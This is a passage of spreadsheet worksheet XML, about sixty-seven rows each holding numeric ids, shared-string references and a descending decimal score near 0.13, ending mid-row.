    <row r="14265" ht="15.75" customHeight="1">
      <c r="A14265" s="1">
        <v>1841.0</v>
      </c>
      <c r="B14265" s="2">
        <v>2.9407283E7</v>
      </c>
      <c r="C14265" s="2" t="s">
        <v>13741</v>
      </c>
      <c r="D14265" s="2">
        <v>1.0</v>
      </c>
      <c r="E14265" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14265" s="2">
        <v>0.1380208333333334</v>
      </c>
    </row>
    <row r="14266" ht="15.75" customHeight="1">
      <c r="A14266" s="1">
        <v>11873.0</v>
      </c>
      <c r="B14266" s="2">
        <v>2.4963907E7</v>
      </c>
      <c r="C14266" s="2" t="s">
        <v>13742</v>
      </c>
      <c r="D14266" s="2">
        <v>1.0</v>
      </c>
      <c r="E14266" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14266" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="14267" ht="15.75" customHeight="1">
      <c r="A14267" s="1">
        <v>30409.0</v>
      </c>
      <c r="B14267" s="2">
        <v>3.8764735E7</v>
      </c>
      <c r="C14267" s="2" t="s">
        <v>13743</v>
      </c>
      <c r="D14267" s="2">
        <v>1.0</v>
      </c>
      <c r="E14267" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14267" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="14268" ht="15.75" customHeight="1">
      <c r="A14268" s="1">
        <v>5483.0</v>
      </c>
      <c r="B14268" s="2">
        <v>4.5760424E7</v>
      </c>
      <c r="C14268" s="2" t="s">
        <v>13744</v>
      </c>
      <c r="D14268" s="2">
        <v>1.0</v>
      </c>
      <c r="E14268" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14268" s="2">
        <v>0.1378968253968255</v>
      </c>
    </row>
    <row r="14269" ht="15.75" customHeight="1">
      <c r="A14269" s="1">
        <v>11458.0</v>
      </c>
      <c r="B14269" s="2">
        <v>2.1899334E7</v>
      </c>
      <c r="C14269" s="2" t="s">
        <v>13745</v>
      </c>
      <c r="D14269" s="2">
        <v>1.0</v>
      </c>
      <c r="E14269" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14269" s="2">
        <v>0.1378968253968255</v>
      </c>
    </row>
    <row r="14270" ht="15.75" customHeight="1">
      <c r="A14270" s="1">
        <v>3865.0</v>
      </c>
      <c r="B14270" s="2">
        <v>4.0329895E7</v>
      </c>
      <c r="C14270" s="2" t="s">
        <v>13746</v>
      </c>
      <c r="D14270" s="2">
        <v>1.0</v>
      </c>
      <c r="E14270" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14270" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="14271" ht="15.75" customHeight="1">
      <c r="A14271" s="1">
        <v>2782.0</v>
      </c>
      <c r="B14271" s="2">
        <v>3.5214896E7</v>
      </c>
      <c r="C14271" s="2" t="s">
        <v>13747</v>
      </c>
      <c r="D14271" s="2">
        <v>1.0</v>
      </c>
      <c r="E14271" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14271" s="2">
        <v>0.1370967741935484</v>
      </c>
    </row>
    <row r="14272" ht="15.75" customHeight="1">
      <c r="A14272" s="1">
        <v>33294.0</v>
      </c>
      <c r="B14272" s="2">
        <v>7481580.0</v>
      </c>
      <c r="C14272" s="2" t="s">
        <v>13748</v>
      </c>
      <c r="D14272" s="2">
        <v>1.0</v>
      </c>
      <c r="E14272" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14272" s="2">
        <v>0.1369731800766285</v>
      </c>
    </row>
    <row r="14273" ht="15.75" customHeight="1">
      <c r="A14273" s="1">
        <v>27.0</v>
      </c>
      <c r="B14273" s="2">
        <v>1.0521813E7</v>
      </c>
      <c r="C14273" s="2" t="s">
        <v>13749</v>
      </c>
      <c r="D14273" s="2">
        <v>1.0</v>
      </c>
      <c r="E14273" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14273" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="14274" ht="15.75" customHeight="1">
      <c r="A14274" s="1">
        <v>10883.0</v>
      </c>
      <c r="B14274" s="2">
        <v>1.6526848E7</v>
      </c>
      <c r="C14274" s="2" t="s">
        <v>13750</v>
      </c>
      <c r="D14274" s="2">
        <v>1.0</v>
      </c>
      <c r="E14274" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14274" s="2">
        <v>0.1369731800766283</v>
      </c>
    </row>
    <row r="14275" ht="15.75" customHeight="1">
      <c r="A14275" s="1">
        <v>30718.0</v>
      </c>
      <c r="B14275" s="2">
        <v>4.3380768E7</v>
      </c>
      <c r="C14275" s="2" t="s">
        <v>13751</v>
      </c>
      <c r="D14275" s="2">
        <v>1.0</v>
      </c>
      <c r="E14275" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14275" s="2">
        <v>0.1369731800766283</v>
      </c>
    </row>
    <row r="14276" ht="15.75" customHeight="1">
      <c r="A14276" s="1">
        <v>32425.0</v>
      </c>
      <c r="B14276" s="2">
        <v>5649844.0</v>
      </c>
      <c r="C14276" s="2" t="s">
        <v>13752</v>
      </c>
      <c r="D14276" s="2">
        <v>1.0</v>
      </c>
      <c r="E14276" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14276" s="2">
        <v>0.1366843033509701</v>
      </c>
    </row>
    <row r="14277" ht="15.75" customHeight="1">
      <c r="A14277" s="1">
        <v>28319.0</v>
      </c>
      <c r="B14277" s="2">
        <v>2.5798017E7</v>
      </c>
      <c r="C14277" s="2" t="s">
        <v>13753</v>
      </c>
      <c r="D14277" s="2">
        <v>1.0</v>
      </c>
      <c r="E14277" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14277" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="14278" ht="15.75" customHeight="1">
      <c r="A14278" s="1">
        <v>1675.0</v>
      </c>
      <c r="B14278" s="2">
        <v>2.8339104E7</v>
      </c>
      <c r="C14278" s="2" t="s">
        <v>13754</v>
      </c>
      <c r="D14278" s="2">
        <v>1.0</v>
      </c>
      <c r="E14278" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14278" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="14279" ht="15.75" customHeight="1">
      <c r="A14279" s="1">
        <v>27805.0</v>
      </c>
      <c r="B14279" s="2">
        <v>2.3261548E7</v>
      </c>
      <c r="C14279" s="2" t="s">
        <v>13755</v>
      </c>
      <c r="D14279" s="2">
        <v>1.0</v>
      </c>
      <c r="E14279" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14279" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="14280" ht="15.75" customHeight="1">
      <c r="A14280" s="1">
        <v>30300.0</v>
      </c>
      <c r="B14280" s="2">
        <v>3.7905323E7</v>
      </c>
      <c r="C14280" s="2" t="s">
        <v>13756</v>
      </c>
      <c r="D14280" s="2">
        <v>1.0</v>
      </c>
      <c r="E14280" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14280" s="2">
        <v>0.1363636363636364</v>
      </c>
    </row>
    <row r="14281" ht="15.75" customHeight="1">
      <c r="A14281" s="1">
        <v>29166.0</v>
      </c>
      <c r="B14281" s="2">
        <v>3.0627426E7</v>
      </c>
      <c r="C14281" s="2" t="s">
        <v>13757</v>
      </c>
      <c r="D14281" s="2">
        <v>1.0</v>
      </c>
      <c r="E14281" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14281" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="14282" ht="15.75" customHeight="1">
      <c r="A14282" s="1">
        <v>4597.0</v>
      </c>
      <c r="B14282" s="2">
        <v>4.2806715E7</v>
      </c>
      <c r="C14282" s="2" t="s">
        <v>13758</v>
      </c>
      <c r="D14282" s="2">
        <v>1.0</v>
      </c>
      <c r="E14282" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14282" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="14283" ht="15.75" customHeight="1">
      <c r="A14283" s="1">
        <v>16680.0</v>
      </c>
      <c r="B14283" s="2">
        <v>4.7293097E7</v>
      </c>
      <c r="C14283" s="2" t="s">
        <v>13759</v>
      </c>
      <c r="D14283" s="2">
        <v>1.0</v>
      </c>
      <c r="E14283" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14283" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="14284" ht="15.75" customHeight="1">
      <c r="A14284" s="1">
        <v>23514.0</v>
      </c>
      <c r="B14284" s="2">
        <v>5836853.0</v>
      </c>
      <c r="C14284" s="2" t="s">
        <v>13760</v>
      </c>
      <c r="D14284" s="2">
        <v>1.0</v>
      </c>
      <c r="E14284" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14284" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="14285" ht="15.75" customHeight="1">
      <c r="A14285" s="1">
        <v>24340.0</v>
      </c>
      <c r="B14285" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C14285" s="2" t="s">
        <v>13761</v>
      </c>
      <c r="D14285" s="2">
        <v>1.0</v>
      </c>
      <c r="E14285" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14285" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="14286" ht="15.75" customHeight="1">
      <c r="A14286" s="1">
        <v>30100.0</v>
      </c>
      <c r="B14286" s="2">
        <v>3649286.0</v>
      </c>
      <c r="C14286" s="2" t="s">
        <v>13762</v>
      </c>
      <c r="D14286" s="2">
        <v>1.0</v>
      </c>
      <c r="E14286" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14286" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="14287" ht="15.75" customHeight="1">
      <c r="A14287" s="1">
        <v>33663.0</v>
      </c>
      <c r="B14287" s="2">
        <v>8406091.0</v>
      </c>
      <c r="C14287" s="2" t="s">
        <v>13763</v>
      </c>
      <c r="D14287" s="2">
        <v>1.0</v>
      </c>
      <c r="E14287" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14287" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="14288" ht="15.75" customHeight="1">
      <c r="A14288" s="1">
        <v>1843.0</v>
      </c>
      <c r="B14288" s="2">
        <v>2.9407283E7</v>
      </c>
      <c r="C14288" s="2" t="s">
        <v>13764</v>
      </c>
      <c r="D14288" s="2">
        <v>1.0</v>
      </c>
      <c r="E14288" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14288" s="2">
        <v>0.1355218855218856</v>
      </c>
    </row>
    <row r="14289" ht="15.75" customHeight="1">
      <c r="A14289" s="1">
        <v>21461.0</v>
      </c>
      <c r="B14289" s="2">
        <v>2.2707472E7</v>
      </c>
      <c r="C14289" s="2" t="s">
        <v>13765</v>
      </c>
      <c r="D14289" s="2">
        <v>1.0</v>
      </c>
      <c r="E14289" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14289" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="14290" ht="15.75" customHeight="1">
      <c r="A14290" s="1">
        <v>8039.0</v>
      </c>
      <c r="B14290" s="2">
        <v>5.2835693E7</v>
      </c>
      <c r="C14290" s="2" t="s">
        <v>13766</v>
      </c>
      <c r="D14290" s="2">
        <v>1.0</v>
      </c>
      <c r="E14290" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14290" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="14291" ht="15.75" customHeight="1">
      <c r="A14291" s="1">
        <v>19984.0</v>
      </c>
      <c r="B14291" s="2">
        <v>5.7621172E7</v>
      </c>
      <c r="C14291" s="2" t="s">
        <v>13767</v>
      </c>
      <c r="D14291" s="2">
        <v>1.0</v>
      </c>
      <c r="E14291" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14291" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="14292" ht="15.75" customHeight="1">
      <c r="A14292" s="1">
        <v>11838.0</v>
      </c>
      <c r="B14292" s="2">
        <v>2.4708978E7</v>
      </c>
      <c r="C14292" s="2" t="s">
        <v>13768</v>
      </c>
      <c r="D14292" s="2">
        <v>1.0</v>
      </c>
      <c r="E14292" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14292" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="14293" ht="15.75" customHeight="1">
      <c r="A14293" s="1">
        <v>17954.0</v>
      </c>
      <c r="B14293" s="2">
        <v>5.1281201E7</v>
      </c>
      <c r="C14293" s="2" t="s">
        <v>13769</v>
      </c>
      <c r="D14293" s="2">
        <v>1.0</v>
      </c>
      <c r="E14293" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14293" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="14294" ht="15.75" customHeight="1">
      <c r="A14294" s="1">
        <v>18034.0</v>
      </c>
      <c r="B14294" s="2">
        <v>5.153583E7</v>
      </c>
      <c r="C14294" s="2" t="s">
        <v>13770</v>
      </c>
      <c r="D14294" s="2">
        <v>1.0</v>
      </c>
      <c r="E14294" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14294" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="14295" ht="15.75" customHeight="1">
      <c r="A14295" s="1">
        <v>18294.0</v>
      </c>
      <c r="B14295" s="2">
        <v>5.2304308E7</v>
      </c>
      <c r="C14295" s="2" t="s">
        <v>13771</v>
      </c>
      <c r="D14295" s="2">
        <v>1.0</v>
      </c>
      <c r="E14295" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14295" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="14296" ht="15.75" customHeight="1">
      <c r="A14296" s="1">
        <v>26715.0</v>
      </c>
      <c r="B14296" s="2">
        <v>1.8228694E7</v>
      </c>
      <c r="C14296" s="2" t="s">
        <v>13772</v>
      </c>
      <c r="D14296" s="2">
        <v>1.0</v>
      </c>
      <c r="E14296" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14296" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="14297" ht="15.75" customHeight="1">
      <c r="A14297" s="1">
        <v>3085.0</v>
      </c>
      <c r="B14297" s="2">
        <v>3.6638343E7</v>
      </c>
      <c r="C14297" s="2" t="s">
        <v>13773</v>
      </c>
      <c r="D14297" s="2">
        <v>1.0</v>
      </c>
      <c r="E14297" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14297" s="2">
        <v>0.134920634920635</v>
      </c>
    </row>
    <row r="14298" ht="15.75" customHeight="1">
      <c r="A14298" s="1">
        <v>3977.0</v>
      </c>
      <c r="B14298" s="2">
        <v>4.0826675E7</v>
      </c>
      <c r="C14298" s="2" t="s">
        <v>13774</v>
      </c>
      <c r="D14298" s="2">
        <v>1.0</v>
      </c>
      <c r="E14298" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14298" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="14299" ht="15.75" customHeight="1">
      <c r="A14299" s="1">
        <v>11763.0</v>
      </c>
      <c r="B14299" s="2">
        <v>2.4178824E7</v>
      </c>
      <c r="C14299" s="2" t="s">
        <v>13775</v>
      </c>
      <c r="D14299" s="2">
        <v>1.0</v>
      </c>
      <c r="E14299" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14299" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="14300" ht="15.75" customHeight="1">
      <c r="A14300" s="1">
        <v>17483.0</v>
      </c>
      <c r="B14300" s="2">
        <v>4.9952696E7</v>
      </c>
      <c r="C14300" s="2" t="s">
        <v>13776</v>
      </c>
      <c r="D14300" s="2">
        <v>1.0</v>
      </c>
      <c r="E14300" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14300" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="14301" ht="15.75" customHeight="1">
      <c r="A14301" s="1">
        <v>33381.0</v>
      </c>
      <c r="B14301" s="2">
        <v>7648281.0</v>
      </c>
      <c r="C14301" s="2" t="s">
        <v>13777</v>
      </c>
      <c r="D14301" s="2">
        <v>1.0</v>
      </c>
      <c r="E14301" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14301" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="14302" ht="15.75" customHeight="1">
      <c r="A14302" s="1">
        <v>13698.0</v>
      </c>
      <c r="B14302" s="2">
        <v>3.6155304E7</v>
      </c>
      <c r="C14302" s="2" t="s">
        <v>13778</v>
      </c>
      <c r="D14302" s="2">
        <v>1.0</v>
      </c>
      <c r="E14302" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14302" s="2">
        <v>0.1343434343434343</v>
      </c>
    </row>
    <row r="14303" ht="15.75" customHeight="1">
      <c r="A14303" s="1">
        <v>31857.0</v>
      </c>
      <c r="B14303" s="2">
        <v>5279556.0</v>
      </c>
      <c r="C14303" s="2" t="s">
        <v>13779</v>
      </c>
      <c r="D14303" s="2">
        <v>1.0</v>
      </c>
      <c r="E14303" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14303" s="2">
        <v>0.1343434343434343</v>
      </c>
    </row>
    <row r="14304" ht="15.75" customHeight="1">
      <c r="A14304" s="1">
        <v>10338.0</v>
      </c>
      <c r="B14304" s="2">
        <v>5.7727077E7</v>
      </c>
      <c r="C14304" s="2" t="s">
        <v>13780</v>
      </c>
      <c r="D14304" s="2">
        <v>1.0</v>
      </c>
      <c r="E14304" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14304" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="14305" ht="15.75" customHeight="1">
      <c r="A14305" s="1">
        <v>15462.0</v>
      </c>
      <c r="B14305" s="2">
        <v>4.3114975E7</v>
      </c>
      <c r="C14305" s="2" t="s">
        <v>13781</v>
      </c>
      <c r="D14305" s="2">
        <v>1.0</v>
      </c>
      <c r="E14305" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14305" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="14306" ht="15.75" customHeight="1">
      <c r="A14306" s="1">
        <v>14614.0</v>
      </c>
      <c r="B14306" s="2">
        <v>4.0260693E7</v>
      </c>
      <c r="C14306" s="2" t="s">
        <v>13782</v>
      </c>
      <c r="D14306" s="2">
        <v>1.0</v>
      </c>
      <c r="E14306" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14306" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="14307" ht="15.75" customHeight="1">
      <c r="A14307" s="1">
        <v>1932.0</v>
      </c>
      <c r="B14307" s="2">
        <v>3.0153534E7</v>
      </c>
      <c r="C14307" s="2" t="s">
        <v>13783</v>
      </c>
      <c r="D14307" s="2">
        <v>1.0</v>
      </c>
      <c r="E14307" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14307" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="14308" ht="15.75" customHeight="1">
      <c r="A14308" s="1">
        <v>2981.0</v>
      </c>
      <c r="B14308" s="2">
        <v>3.6153695E7</v>
      </c>
      <c r="C14308" s="2" t="s">
        <v>13784</v>
      </c>
      <c r="D14308" s="2">
        <v>1.0</v>
      </c>
      <c r="E14308" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14308" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="14309" ht="15.75" customHeight="1">
      <c r="A14309" s="1">
        <v>29073.0</v>
      </c>
      <c r="B14309" s="2">
        <v>3.0320592E7</v>
      </c>
      <c r="C14309" s="2" t="s">
        <v>13785</v>
      </c>
      <c r="D14309" s="2">
        <v>1.0</v>
      </c>
      <c r="E14309" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14309" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="14310" ht="15.75" customHeight="1">
      <c r="A14310" s="1">
        <v>30005.0</v>
      </c>
      <c r="B14310" s="2">
        <v>3612938.0</v>
      </c>
      <c r="C14310" s="2" t="s">
        <v>13786</v>
      </c>
      <c r="D14310" s="2">
        <v>1.0</v>
      </c>
      <c r="E14310" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14310" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="14311" ht="15.75" customHeight="1">
      <c r="A14311" s="1">
        <v>888.0</v>
      </c>
      <c r="B14311" s="2">
        <v>2.2020131E7</v>
      </c>
      <c r="C14311" s="2" t="s">
        <v>13787</v>
      </c>
      <c r="D14311" s="2">
        <v>1.0</v>
      </c>
      <c r="E14311" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14311" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="14312" ht="15.75" customHeight="1">
      <c r="A14312" s="1">
        <v>5857.0</v>
      </c>
      <c r="B14312" s="2">
        <v>4.6942192E7</v>
      </c>
      <c r="C14312" s="2" t="s">
        <v>13788</v>
      </c>
      <c r="D14312" s="2">
        <v>1.0</v>
      </c>
      <c r="E14312" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14312" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="14313" ht="15.75" customHeight="1">
      <c r="A14313" s="1">
        <v>9201.0</v>
      </c>
      <c r="B14313" s="2">
        <v>5.5398084E7</v>
      </c>
      <c r="C14313" s="2" t="s">
        <v>13789</v>
      </c>
      <c r="D14313" s="2">
        <v>1.0</v>
      </c>
      <c r="E14313" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14313" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="14314" ht="15.75" customHeight="1">
      <c r="A14314" s="1">
        <v>31608.0</v>
      </c>
      <c r="B14314" s="2">
        <v>5.1390025E7</v>
      </c>
      <c r="C14314" s="2" t="s">
        <v>13790</v>
      </c>
      <c r="D14314" s="2">
        <v>1.0</v>
      </c>
      <c r="E14314" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14314" s="2">
        <v>0.1331994645247658</v>
      </c>
    </row>
    <row r="14315" ht="15.75" customHeight="1">
      <c r="A14315" s="1">
        <v>15434.0</v>
      </c>
      <c r="B14315" s="2">
        <v>4.296348E7</v>
      </c>
      <c r="C14315" s="2" t="s">
        <v>13791</v>
      </c>
      <c r="D14315" s="2">
        <v>1.0</v>
      </c>
      <c r="E14315" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14315" s="2">
        <v>0.1331569664902999</v>
      </c>
    </row>
    <row r="14316" ht="15.75" customHeight="1">
      <c r="A14316" s="1">
        <v>16736.0</v>
      </c>
      <c r="B14316" s="2">
        <v>4.7522372E7</v>
      </c>
      <c r="C14316" s="2" t="s">
        <v>13792</v>
      </c>
      <c r="D14316" s="2">
        <v>1.0</v>
      </c>
      <c r="E14316" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14316" s="2">
        <v>0.1331569664902999</v>
      </c>
    </row>
    <row r="14317" ht="15.75" customHeight="1">
      <c r="A14317" s="1">
        <v>31299.0</v>
      </c>
      <c r="B14317" s="2">
        <v>4966443.0</v>
      </c>
      <c r="C14317" s="2" t="s">
        <v>13793</v>
      </c>
      <c r="D14317" s="2">
        <v>1.0</v>
      </c>
      <c r="E14317" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14317" s="2">
        <v>0.1331569664902999</v>
      </c>
    </row>
    <row r="14318" ht="15.75" customHeight="1">
      <c r="A14318" s="1">
        <v>18637.0</v>
      </c>
      <c r="B14318" s="2">
        <v>5.3408046E7</v>
      </c>
      <c r="C14318" s="2" t="s">
        <v>13794</v>
      </c>
      <c r="D14318" s="2">
        <v>1.0</v>
      </c>
      <c r="E14318" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14318" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="14319" ht="15.75" customHeight="1">
      <c r="A14319" s="1">
        <v>13829.0</v>
      </c>
      <c r="B14319" s="2">
        <v>3.67716E7</v>
      </c>
      <c r="C14319" s="2" t="s">
        <v>13795</v>
      </c>
      <c r="D14319" s="2">
        <v>1.0</v>
      </c>
      <c r="E14319" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14319" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="14320" ht="15.75" customHeight="1">
      <c r="A14320" s="1">
        <v>18014.0</v>
      </c>
      <c r="B14320" s="2">
        <v>5.1480548E7</v>
      </c>
      <c r="C14320" s="2" t="s">
        <v>13796</v>
      </c>
      <c r="D14320" s="2">
        <v>1.0</v>
      </c>
      <c r="E14320" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14320" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="14321" ht="15.75" customHeight="1">
      <c r="A14321" s="1">
        <v>25170.0</v>
      </c>
      <c r="B14321" s="2">
        <v>1.3109894E7</v>
      </c>
      <c r="C14321" s="2" t="s">
        <v>13797</v>
      </c>
      <c r="D14321" s="2">
        <v>1.0</v>
      </c>
      <c r="E14321" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14321" s="2">
        <v>0.1328125000000001</v>
      </c>
    </row>
    <row r="14322" ht="15.75" customHeight="1">
      <c r="A14322" s="1">
        <v>1113.0</v>
      </c>
      <c r="B14322" s="2">
        <v>2.405179E7</v>
      </c>
      <c r="C14322" s="2" t="s">
        <v>13798</v>
      </c>
      <c r="D14322" s="2">
        <v>1.0</v>
      </c>
      <c r="E14322" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14322" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="14323" ht="15.75" customHeight="1">
      <c r="A14323" s="1">
        <v>8346.0</v>
      </c>
      <c r="B14323" s="2">
        <v>5.3731696E7</v>
      </c>
      <c r="C14323" s="2" t="s">
        <v>13799</v>
      </c>
      <c r="D14323" s="2">
        <v>1.0</v>
      </c>
      <c r="E14323" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14323" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="14324" ht="15.75" customHeight="1">
      <c r="A14324" s="1">
        <v>16006.0</v>
      </c>
      <c r="B14324" s="2">
        <v>4.497988E7</v>
      </c>
      <c r="C14324" s="2" t="s">
        <v>13800</v>
      </c>
      <c r="D14324" s="2">
        <v>1.0</v>
      </c>
      <c r="E14324" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14324" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="14325" ht="15.75" customHeight="1">
      <c r="A14325" s="1">
        <v>996.0</v>
      </c>
      <c r="B14325" s="2">
        <v>2.2926873E7</v>
      </c>
      <c r="C14325" s="2" t="s">
        <v>13801</v>
      </c>
      <c r="D14325" s="2">
        <v>1.0</v>
      </c>
      <c r="E14325" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14325" s="2">
        <v>0.1327683615819208</v>
      </c>
    </row>
    <row r="14326" ht="15.75" customHeight="1">
      <c r="A14326" s="1">
        <v>1040.0</v>
      </c>
      <c r="B14326" s="2">
        <v>2.3260649E7</v>
      </c>
      <c r="C14326" s="2" t="s">
        <v>13802</v>
      </c>
      <c r="D14326" s="2">
        <v>1.0</v>
      </c>
      <c r="E14326" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14326" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="14327" ht="15.75" customHeight="1">
      <c r="A14327" s="1">
        <v>10518.0</v>
      </c>
      <c r="B14327" s="2">
        <v>1.1846374E7</v>
      </c>
      <c r="C14327" s="2" t="s">
        <v>13803</v>
      </c>
      <c r="D14327" s="2">
        <v>1.0</v>
      </c>
      <c r="E14327" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14327" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="14328" ht="15.75" customHeight="1">
      <c r="A14328" s="1">
        <v>11894.0</v>
      </c>
      <c r="B14328" s="2">
        <v>2.5110706E7</v>
      </c>
      <c r="C14328" s="2" t="s">
        <v>13804</v>
      </c>
      <c r="D14328" s="2">
        <v>1.0</v>
      </c>
      <c r="E14328" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14328" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="14329" ht="15.75" customHeight="1">
      <c r="A14329" s="1">
        <v>13893.0</v>
      </c>
      <c r="B14329" s="2">
        <v>3.7033752E7</v>
      </c>
      <c r="C14329" s="2" t="s">
        <v>13805</v>
      </c>
      <c r="D14329" s="2">
        <v>1.0</v>
      </c>
      <c r="E14329" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14329" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="14330" ht="15.75" customHeight="1">
      <c r="A14330" s="1">
        <v>17165.0</v>
      </c>
      <c r="B14330" s="2">
        <v>4.8890225E7</v>
      </c>
      <c r="C14330" s="2" t="s">
        <v>13806</v>
      </c>
      <c r="D14330" s="2">
        <v>1.0</v>
      </c>
      <c r="E14330" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14330" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="14331" ht="15.75" customHeight="1">
      <c r="A14331" s="1">
        <v>18882.0</v>
      </c>
      <c r="B14331" s="2">
        <v>5.4105755E7</v>
      </c>
      <c r="C14331" s="2" t="s">
        <v>13807</v>
      </c>
      <c r="D14331" s="2">
        <v>1.0</v>
      </c>
      <c r="E14331" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14331" s="2">
        <v>0.1325925925925927</v>
      </c>
    </row>
    <row r="14332" ht="15.75" customHeight="1">
